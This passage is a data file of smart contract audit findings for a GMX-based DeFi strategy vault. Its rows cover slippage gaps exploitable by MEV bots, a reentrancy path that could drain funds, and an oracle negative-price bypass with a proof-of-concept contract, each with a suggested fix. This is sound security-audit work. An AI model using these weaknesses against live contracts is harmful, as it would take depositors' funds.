ex :\\n`tokenA` balance = 100, debtA = 80.\\ntokenB balance = 50 , debtB = 70.\\nafter swap `tokenA` for 20 tokenB .\\n`tokenA` balance = 75 , debtA = 80 : in this case `repay` will keep revert .\\nso if the contract accumulates bad debts(in value), the `emergencyClose()` function will always revert, preventing any debt repayment.\\nAnother critical factor to consider is the time between the `pause` action and the emergency `close` action. During periods of high volatility, the `pause` action temporarily halts the contract, but the prices of the two assets may continue to decline. The emergency `close` function can only be triggered by the owner, who operates a time-lock wallet. In the time between the `pause` and `close` actions, the prices may drop significantly and this condition will met since the `swap` is needed in almost all cases.",the debt need to be repayed in the `pause` action. and in case of `resume` just re-borrow again.,`emergencyClose()` function will consistently fail to repay any debt.\\nlenders may lose all their funds,"```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit 
EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n" +Missing minimum token amounts in the emergency contract functions allows MEV bots to take advantage of the protocols emergency situation,medium,"When an emergency situation arises and the protocol pauses or resumes the operation of the vault. All funds of the vault are removed from GMX or added back to GMX without any protection against slippage. This allows MEV bots to take advantage of the protocol's emergency situation and make huge profits with it.\\nWhen an emergency situation arises the protocol owners can call the emergencyPause function to remove all the liquidity from GMX:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\nBut the minimum tokens amount to get back when removing liquidity is not provided to the RemoveLiquidityParams:\\n```\\nstruct RemoveLiquidityParams {\\n // Amount of lpToken to remove liquidity\\n uint256 lpAmt;\\n // Array of market token in array to swap tokenA to other token in market\\n address[] tokenASwapPath;\\n // Array of market token in array to swap tokenB to other token in market\\n address[] tokenBSwapPath;\\n // Minimum amount of tokenA to receive in token decimals\\n uint256 minTokenAAmt;\\n // Minimum amount of tokenB to receive in token decimals\\n uint256 minTokenBAmt;\\n // Execution fee sent to GMX for removing liquidity\\n uint256 executionFee;\\n}\\n```\\n\\nAs it is not set, the default value 0 (uint256) is used. 
Therefore, up to 100% slippage is allowed.\\nThe same parameters are also missing when normal operation resumes:\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n\\nTherefore, MEV bots could take advantage of the protocol's emergency situation and as these trades include all funds of the vault it could lead to a big loss.\\nIgnoring slippage when pausing could be a design choice of the protocol to avoid the possibility of a revert and pause the system as quickly as possible. However, this argument does not apply during the resume.","Implement a custom minMarketTokens parameter, but do not implement the usual slippage calculation, as this could potentially lead to new critical vulnerabilities. If for example the reason for this emergency situation is a no longer supported chainlink feed, which will lead to reverts and therefore also to DoS of the emergency close / withdraw flow.",Big loss of funds as all funds of the strategy vault are unprotected against MEV bots.,"```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n" +A bad price can be delivered in ChainlinkARBOracle,low,"When the `consultIn18Decimals()` is called, can be returned a negative value. 
Because not exist correct validation for negative response.\\nThe `ChainlinkARBOracle.sol` has to garantie delivered correct price. Howerver exist a potencial scenario of this situation may be breaking.\\nLets break each one part of this scenario:\\nWhen `consultIn18Decimals()` is called, and call to `consult()` this function is encharge `of` verifie each answer and delivere a price not old, not zero,non-negative and garantie `of` sequencer is up.\\nPosible scenario in `consult()` for the moment, we have: `chainlinkResponse.answer = x where x > 0` `prevChainlinkResponse.answer = y where y < 0` This is a negative value given by Chainlink\\n`_chainlinkIsFrozen()` is pass correctly\\n`_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)` evaluate the following functions:\\n`_badChainlinkResponse(currentResponse)` pass correctly.\\n`_badChainlinkResponse(prevResponse)` pass also correctly because is only check if the value is zero, but not negative see : `if (response.answer == 0) { return true; }`\\n_badPriceDeviation(currentResponse, prevResponse, token): `if( currentResponse.answer > prevResponse.answer)` remember `currentResponse.answer = x where x > 0 and prevResponse.answer = y where y < 0` So. x > y . This condition is passed successfully..\\nFor the evaluation `of` `_deviation` we have: `_deviation = uint256(currentResponse.answer - prevResponse.answer) * SAFE_MULTIPLIER / uint256(prevResponse.answer); The result will always return zero. 
So validation on` _badPriceDeviationof_deviation > maxDeviations[token]always returnsfalsebecause zero can never be greater for any number ofmaxDeviations[token]since it only accepts numbers `of` typeuint256 `\\nPOC :\\nThis scenario is illustrated in a minimalist example, which you can use in Remix:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = 
uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n","This behavior can be mitigated by setting the correct conditional:\\n```\\nif (response.answer <= 0) { return true; }\\n```\\n\\nAlso,due of only consultIn18Decimals() is the function that is called for the protocol. Visibility to ""consult"" may be restricted. Change from ""public"" to ""internal"".","High, the base protocol is how you get the price of the securities. The answer may be different than what is allowed. Because the maximum deviations will not be counted.","```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. 
-3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n" +re-entrency possible on processWithdraw since external call is made before burning user's shares in Vault,medium,"re-entrency possible on processWithdraw since external call is made before burning user's shares in Vault\\n```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("""");\\n require(success, ""Transfer failed."");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n 
self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXWithdraw.sol#L182-L197\\nSince the function is only accessible by keeper (likely a router), which from the example of the mockRouter, would bundle the withdraw and ""afterWithdrawalExecution"" together. However since the router is out-of-scope, and there is still a possible chance that the user can make use of the router to re-enter into the function (without re-entrency lock), and be able to drain more fund that he actually deserves. This is submitted as a medium risk.","burn user's share first, before executing external call at the end.",drain of user funds.,"```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("""");\\n require(success, ""Transfer failed."");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n" +"min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx 
for cost-free manipulation",medium,"min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation\\nGMX provides getMarketTokenPrice on its synethicReader which leverages MarketUtils. It allows passing in index/long/short token price with min/max. The isDeposit flag would then be used to determine whether the min or max price would be used for calculating marketTokenPrice, this is important to always favor the protocol and prevent MEV.\\nHowever on the getMarketTokenInfo implemented in GMXOracle, it passes in the same price from the oracle to the min/max price for all long&short/lpToken. This implies the same pricing is used for both deposit and withdrawal, enabling user to freely deposit/withdraw without cost or slippage. Malicious users can use this to trigger rebalance, and hence deposit or withdrawal directly on GMX that benefit the attacker with the use of bundled tx.\\n```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n\\nhttps://github.com/gmx-io/gmx-synthetics/blob/613c72003eafe21f8f80ea951efd14e366fe3a31/contracts/reader/Reader.sol#L187-L206",consider adding a small fee(5bps) to buffer the price returned from `_getTokenPriceMinMaxFormatted` on both sides.,"free deposit and withdrawal due to the same token price is used for min or max price, which leading to the same marketTokenPrice calculation for deposit and withdrawal.","```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n 
Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n" +Chainlinks oracle feeds are not immutable,medium,"That a chainlink oracle works does not mean it will be supported by chainlink in the future and keeps working, and it could also be possible that the address of the price feed changes. Therefore, it does not make sense to prevent price feed addresses from being updated, or removed, but the protocol prevents that.\\nThere is only one function inside ChainlinkARBOracle to update the price feed addresses:\\n```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n\\nAs we can see it will only allow to set the price feed ones and revert if trying to update, or remove a price feed. Therefore, if chainlink changes something, or the owner accidentally set the wrong address, or the protocol no longer wants to support a price feed, it can not be removed, or updated.",Chainlinks oracle feeds are not immutable\\nRemove this line:\\n```\\nif (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n```\\n,"It is not possible to remove price feeds which are no longer supported by chainlink, or update the addresses of price feeds. 
This can lead to a complete DoS of the underlying token.\\nAs this feeds mapping is also the only check if it is a valid token when calling the oracle and the feed can not be removed, it will always pass this check even if the protocol no longer wishes to support this token:\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n // rest of code\\n}\\n```\\n","```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n" +Unhandled DoS when access to Chainlik oracle is blocked,low,"In certain exceptional scenarios, oracles may become temporarily unavailable. As a result, invoking the `latestRoundData` function could potentially revert without a proper error handling.\\nSteadefi documentation gives special focus on Chainlink price feed dependency, (https://github.com/Cyfrin/2023-10-SteadeFi/tree/main ""Additional Context""). The concern stems from the potential for Chainlink multisignature entities to deliberately block the access to the price feed. In such a situation, using the `latestRoundData` function could lead to an unexpected revert.\\nIn certain extraordinary situations, Chainlink has already proactively suspended particular oracles. To illustrate, in the case of the UST collapse incident, Chainlink chose to temporarily halt the UST/ETH price oracle to prevent the propagation of incorrect data to various protocols.\\nAdditionally, this danger has been highlighted and very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. 
For our current scenario:\\n""While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly"".\\nAs a result and taking into consideration the recommendation from OpenZepplin, it is essential to thoroughly tackle this matter within the codebase, as it directly relates to many functionalities of the system which are based on the oracle's output.\\nAnother example to check this vulnerability can be consulted in https://solodit.xyz/issues/m-18-protocols-usability-becomes-very-limited-when-access-to-chainlink-oracle-data-feed-is-blocked-code4rena-inverse-finance-inverse-finance-contest-git\\nAs previously discussed, to mitigate the potential risks related to a denial-of-service situation, it is recommended to implement a try-catch mechanism when querying Chainlink prices in the `_getChainlinkResponse` function within `ChainlinkARBOracle.sol` (link to code below). 
By adopting this approach, in case there's a failure in invoking the price feed, the caller contract retains control and can effectively handle any errors securely and explicitly.\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L188-L194\\n```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n","Unhandled DoS when access to Chainlik oracle is blocked\\nWrap the invocation of the `latestRoundData()` function within a `try-catch` structure rather than directly calling it. In situations where the function call triggers a revert, the catch block can be utilized to trigger an alternative oracle or handle the error in a manner that aligns with the system's requirements.","In the event of a malfunction or cessation of operation of a configured Oracle feed, attempting to check for the `latestRoundData` will result in a revert that must be managed manually by the system.","```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n" +`Compound()` will not work if there is only TokenA/TokenB in the trove.,medium,"The compound() function is designed to deposit Long tokens, Short tokens, or airdropped ARB tokens to the GMX for compounding. However, it will only work if there is ARB token in the trove. If there are only Long/Short tokens in the trove without any ARB, the function will not work.\\nThe `compound()` function is intended to be called by the keeper once a day to deposit all the Long/Short or ARB tokens to the GMX for further compounding. 
However, the logic for depositing to the GMX is restricted by the condition that the trove must always hold an airdropped ARB token.\\nHere is the relevant code snippet from the GitHub repository:\\n```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nThe code checks if there is a positive `_tokenInAmt` (representing ARB tokens) and proceeds with the depositing and compounding logic. However, if there is no ARB token but only tokenA and tokenB in the trove, the compounding will not occur and the tokens will remain in the compoundGMX contract indefinitely.\\nIt is important to note that the airdrop of ARB tokens is a rare event, making it less likely for this condition to be met. 
Therefore, if there are no ARB tokens but a significant amount of tokenA and tokenB in the trove, the compounding will not take place.","To mitigate this issue, it is important to always check if either tokenA/tokenB or ARB is present in the trove. If either of these is present, then proceed with the compound action. Otherwise, return.\\n```\\nif (_tokenInAmt > 0 || self.tokenA.balanceOf(address(this) > 0 || self.tokenB.balanceOf(address(this)) ) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n",If the compounding doesn't happen this could lead to the indirect loss of funds to the user and loss of gas for the keeper who always calls this function just to transfer tokens and check the balance of ARB.,"```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = 
payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n" +Positions may be liquidated due to incorrect implementation of Oracle logic,medium,"Steadefi checks for historical data to make sure that last price update are within maximum delya allowed and in the range of maximum % deviation allowed.\\nBut checking the historical data is incorrect according to the chainlink docs which can damage some serious logic with in the protcol\\nVault calls ChainlinkARBOracle.consult(token) to get the fair price from chainlink oracle\\n```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = 
_getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L62\\nwhich calls an interval function `_getPrevChainlinkResponse()` and try to fetch previous roundId price and other details\\n```\\n function _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _prevChainlinkResponse;\\n\\n (\\n uint80 _roundId,\\n int256 _answer,\\n /* uint256 _startedAt */,\\n uint256 _timestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).getRoundData(_currentRoundId - 1);\\n\\n _prevChainlinkResponse.roundId = _roundId;\\n _prevChainlinkResponse.answer = _answer;\\n _prevChainlinkResponse.timestamp = _timestamp;\\n _prevChainlinkResponse.success = true;\\n\\n return _prevChainlinkResponse;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L210\\nBut this is incorrect way of fetching historical data. chainlink docs say: `Oracles provide periodic data updates to the aggregators. Data feeds are updated in rounds. Rounds are identified by their roundId, which increases with each new round. This increase may not be monotonic. Knowing the roundId of a previous round allows contracts to consume historical data.\\nThe examples in this document name the aggregator roundId as aggregatorRoundId to differentiate it from the proxy roundId.` check here\\nso it is not mendatory that there will be valid data for currentRoundID-1. 
if there is not data for currentRooundId-1 then `_badPriceDeviation(currChainlinkResponse,PrevResponse)` check here will return true. Hence vault won't able to get the price of token at some specific times",Positions may be liquidated due to incorrect implementation of Oracle logic\\nAs chainlink docs says. Increase in roundId may not be monotonic so loop through the previous roundID and fetch the previoous roundId data\\npseudo code\\n```\\n iterate (from roundId-1 to untill we get previous first data corressponding to roundID){\\n if(data present for roundID){\\n fetch the data and return\\n }else{\\n again iterate to get the data\\n }\\n }\\n```\\n,"In worse case keeper won't able to get the price of token so rebalancing , debt repay won't be possible leading to liquidation breaking the main important factor of protocol\\nAlmost 70% of vault action is dependent on price of a token and not getting price will make them inactive affecting net APR","```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n" +Incorrect Execution Fee Refund address on Failed Deposits or withdrawals in Strategy Vaults,high,"The Strategy Vaults within the protocol use a two-step process for handling deposits/withdrawals via GMXv2. 
A `createDeposit()` transaction is followed by a callback function (afterDepositExecution() or afterDepositCancellation()) based on the transaction's success. In the event of a failed deposit due to vault health checks, the execution fee refund is mistakenly sent to the depositor instead of the keeper who triggers the deposit failure process.\\nThe protocol handles the `deposit` through the `deposit` function, which uses several parameters including an execution fee that refunds any excess fees.\\n```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n\\nThe refund is intended for the message sender (msg.sender), which in the initial deposit case, is the depositor. 
